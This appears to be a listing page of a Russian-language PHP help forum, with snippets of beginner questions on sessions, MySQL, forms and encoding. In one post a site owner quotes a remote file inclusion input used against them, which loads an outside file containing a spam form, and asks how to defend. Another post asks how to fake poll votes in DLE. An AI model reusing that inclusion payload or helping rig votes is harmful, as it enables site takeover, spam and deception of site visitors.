PHP
A general-purpose scripting language especially suited to web development
Explore Questions
There are no popular questions to show right now
-
0 votes2 answers
-
0 votes1 answer
-
0 votes1 answer
-
0 votes2 answers
-
0 votes0 answers
2481 questions in this forum
-
показывает пусто на login.php
помогите пожалуйста когда захожу http://vh53223.eurodir.ru/login.php или http://vh53223.eurodir.ru/reg.html показывает что пусто,как это исправить? login.php <?require_once('zsecurity.php');session_start();if (isset($_POST['logusername'])){ include('header.php'); $username=uc(strtolower($_POST['logusername'])); $password=uc($_POST['logpassword']); if (strtolower($_POST['code'])!= strtolower($_SESSION['texto']) OR !isset($_SESSION["texto"])) { echo "$infstart Неверно введен код с картинки... $infend <br>"; include('footer.php'); exit(); } if ($password==NULL) { echo "$infstart Введите пароль! $infend";include('footer.php'); exit; } $query = mysql…
0 votes4 answers -
MySQL
Добрый день. Тут такой вопрос, при установки MySQl выводится критическая ошибка. я где-то видел это в часто задаваемых вопросах, но как назло немогу найти. Подскажите пожалуста ссылку где есть описание
0 votes1 answer -
Mysql: выборка топа статей по количеству коментов
есть 2 таблицы со следующими именами и полями articles id | body и coments id | article_id | body Подскажите плз, Как выбрать топ статей по кол-ву коментариев?
0 votes1 answer -
Массивы
Всем здрасте! Ребят, я конечно понимаю что вопрос очень простой для кого-то покажется, но все же... Инфы по массивам очень много в инете и вобщем то все прекрасно описано, но мне надо знать какую именно функцию применить в моем случае. Существует форма, в форме автоматом создаются поля типа инпут, в которых так же автоматом создаются name="name[0]", name="name[1]", name="name[2]" и т.д... соответственно в обработчике мне надо вытащить значения, которые пришли постом из name="name[]" обритившись по индексу, но не к конкретному, а ко всем индексам. Пробовал копать в сторону array_keys но что то не понял что дальше делать с результатом.
0 votes9 answers -
Как передать пару массивов из одного файла в другой?
Всем привет! Что то я совсем запутался и не могу никак распутаться. В общем нужна помощь свежей головы. Ситуёвина в общем такая. Есть у меня формула по которой происходят расчеты в заданном интервале. Пользователь вводит, значения, указывает интервал (например от 1 до 10) и формула в этом интервале все считает. В результате все данные записываются в 2 массива 1. значения интервала, 2-ой результаты подсчета. Все вывожу в виде таблицы. Сразу скажу что форма находится в файле index.php, данные из формы передает на себя (т.е. index.php), все делаю в одном файле. Теперь я захотел что бы это выводилось в виде графика. Подключил open flash chart. Подключается он вот так: &l…
0 votes9 answers -
На локальном сервере не работает капча.
Беру капчу отсюда - http://lifeexample.ru/php-primeryi-skriptov/kapcha-na-php.html Вставляю на сервер - картинка не загружается. На удаленных серверах на некоторых раблотает, на некоторых нет. в чем причина?
0 votes16 answers -
Передача данных из таблицы
Добрый день! Возникла такая необходимость передавать обработчику данные не из формы, а из ячеек таблицы. Интересует последовательность действий: что с начала делаем, что потом... Я понимаю что это скорее всего методом пост можно, но как это сделать грамотно? З.Ы. данные должны отправляться на почту.
0 votes5 answers -
Ошипка
Выводит зараза такое предупреждение- Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at W:\home\test1.ru\www\game\indexg.php:8) in W:\home\test1.ru\www\game\indexg.php on line 149 Как устранить?
0 votes5 answers -
Кодировка
День добрый, делаю сайт, и как и многие устал меню менять на каждой страничке, при каком-либо изменении. Вынес его в отдельный файл menu.php, подключаю через require_once, и вроде всё ок, да только кодировка страницы перестала совпадать с кодировкой меню, вызывающегося из menu.php. Как избавиться от этой проблемы? Очень нуждаюсь в помощи! Меню написано на только на html. В файле menu.php только оно.
0 votes7 answers -
Подскажите функции DOM
Хотел сделать парсер HTML кода используя DOM модель, но столкнулся с проблемой - не работает как заявлен встроенный класс DOMDocument и его свойства и методы. Может быть я не правильно что делал, подскажите кто работал или кто знает.
0 votes4 answers -
Обязательные и не обязательные поля к отправке SMTP mail PHP
Всем привет! Помогите, пожалуйста, доработать код формы обратной связи.. Необходимо, чтобы поле message было не обязательным к отправке. Сейчас ситуация следующая: письма из формы уходят на почту, но если поле сообщение не заполнено, письмо не уходит. <div class="btn-greenbackground pt-40 pb-15 pl-30"> <div class="adaptive-header"><h30><p style="line-height: 0.35"><b>Отправьте заявку на участие</b><br/> __________________________</p></h30> </div></div> <!-- атрибут required говорит, что заполнение поля обязательно --> <…
0 votes0 answers -
__construct()
class name_klass { function __construct() { ... } } или class name_klass { function name_klass() { ... } } знаю что последний для совместимости со старыми пхп Но я не собираюсь возвращаться в 20 век и поэтому вопрос, что лучше? Я юзаю первый вариант поскольку удобно воспринимать код.
0 votes3 answers -
Создание инсталлятора
Народ, кто пробовал реализовывать модульность на своем сайте, и разрабатывал для этого инсталлятор на php или попадался скрипт
0 votes8 answers -
Вопрос по SQL
Поставив для себя ряд интересных задач, я понял что мои знания по sql ничтожно малы. И я решил занятся активным изучением. После 2 часов читания манула и битья головой об стенку я составил такой вот запрос для вывода всех новостей, чьи авторы напсиали больше 1 новости. SELECT author.name, news.id, news.header FROM author, news WHERE author.id = news.author AND 1 < (SELECT COUNT(*) FROM news WHERE author = author.id) в результате это выводит все что мне надо, но я хотел бы узнать, можно ли сделать такой же результат, но попроще?
0 votes9 answers -
Как сделать кучу опросов?
Здравствуйте. Знакомый попросил поправить сайт. Попросили сделать опрос их там валом... а я так понял в джумле не получится сделать не сколько опросов, вот думаю как реализовать все это по лучше. Плюсы того как я сделал: 1. Легко и не паришься)) где то в нете нарвался на статью как делать опрос через gmail Минусы: 1. голосовать можно сколько угодно с одного айпи 2. вывод результатов говно кто что посоветует?
0 votes5 answers -
как засунуть отформатированный текст в textarea
условие такое: нужно в текстариа в режиме ридонли (если есть какой-то эквивалент, заменяющий текстариа, коротый будет отображать текст с полосой прокрутки, то он мне, наверное, больше подойдет) вставить текст из БД, но так, чтобы где есть болд -- там отображался болд, если италик -- то италик. пробовала так: <textarea cols='63' rows='9' readonly="readonly" name='Post' class='textinput' > html_entity_decode($conditions); </textarea> в $conditions содержиться например такое: а в форме в браузере отображается вообще страшно:
0 votes12 answers -
Появление цены после выбора свойства из списка
Ребят, помогите пожалуйста вот с чем: есть список, после выбора свойства из которого должна выводиться информация (в моём случае при помощи вот такого кода: (".$vorzeichen." ".$CURRENCY_DISPLAY->getFullValue($price).")). Как это реализовать?
0 votes5 answers -
Вывод информации из БД
Помогите разобраться, Вот примерный код: printf ("<td><b>%s</b></td>", $myrow['login']); Маркер между тегами b и /b выводит информацию жмрным шрифтом, это понятно, но ни как не пойму как задать цвет для данных этой ячейки, и возможно ли это?
0 votes5 answers -
настройки Rapid PHP 2008
Привет народ! Никто не пользуется Rapid PHP 2008? Не могу разобраться с настройкой превью-отображения созданного файла php... Вроде бы указал движку путь к cgi Denwer, но что-то ни фига не работает так как надо... А пользоваться выводом через урл - не удобно, хотя и возможно. Хэлп!
0 votes1 answer -
CMS
помогите новичку в сms. владею хтмл, разбираюсь в яваскрипт и немного хтмл. хочу научиться подключать сms. какую лучше осваивать сразу чтобы не тратить время? друпал? вордпресс? дайте плиз ссылочки на мануалы либо шаблоны расталкованные с вордпресс по вашему смотрению заранее благодарен
0 votes3 answers -
Сделал небольшой скрипт опроса
Протестируйте пожалуйста http://dkakharov.000webhostapp.com/ Иногда будет выдавать результат на +/- 1 процент от ста. Вот весь код db.php <?php error_reporting(E_ALL); $host = 'localhost'; $user = 'root'; $password = ''; $db_name = 'quiz'; $link = mysqli_connect($host, $user, $password, $db_name) or die(mysqli_error($link)); mysqli_query($link, "SET NAMES 'utf8'"); ?> index.php <?php require_once ('db.php'); $sql = "SELECT * FROM question"; $query = mysqli_query($link, $sql) or die(mysqli_error($link)); for ($res = []; $row = mysqli_fetch_assoc($query); $res[] = $row); …
0 votes2 answers -
Как исправить ошибку
Добрый день ошибка на фото, ни как не пойму как исправить. Как решить проблему, подскажите пожалуйста Сайт http://foodsnab.3na3.ru
0 votes0 answers -
накрутка голосов
Кто работает с движком dle? Подскажите, пожалуйста, как в dle можно накрутить результат голосов. надо в начале создать видимость популярности опросов
0 votes2 answers -
Запись данных из формы в БД
Есть такая форма: <form name='form> <p> <label>Название<br> <input value="<? echo $myrow_get_name[work_name] ?>" type="text" name="work_name" id="work_name" style="width:370px"> </label> </p> <p> <label>ID автора<br> <input value="<? echo $author_id[author_id] ?>" type="text" name="author_id" id="author_id" style="width:35px"> </label> </p> <p> <label>Текст<br /> <textarea name="work_text" id="work_tex" cols="100" rows="50" style="font:Tahoma, G…
0 votes11 answers -
Порблема с защитой, попытка отправки спама с моего email
Добрый день! Возникла проблема. Страницы на сайте генерируются с помощью функции include(), адрес файла передается в ссылке пример index.php?cont=vasya.html. нехороший человек сделал следующее index.php?cont=http://www.freewebtown.com/xslayter1533/frangoSlayter.txt? там форма для рассылки спама... Спам до адресатов не дошел, но ситуация очень неприятная... Каким образом можно защитить сайт от подобных попыток? Слышал что можно кодировать данные в md5, но как именно не понял. Или есть более простая (надежная альтернатива)? Я понимаю, что ошибка глупейшая но очень надеюсь на Вашу помощь!
0 votes6 answers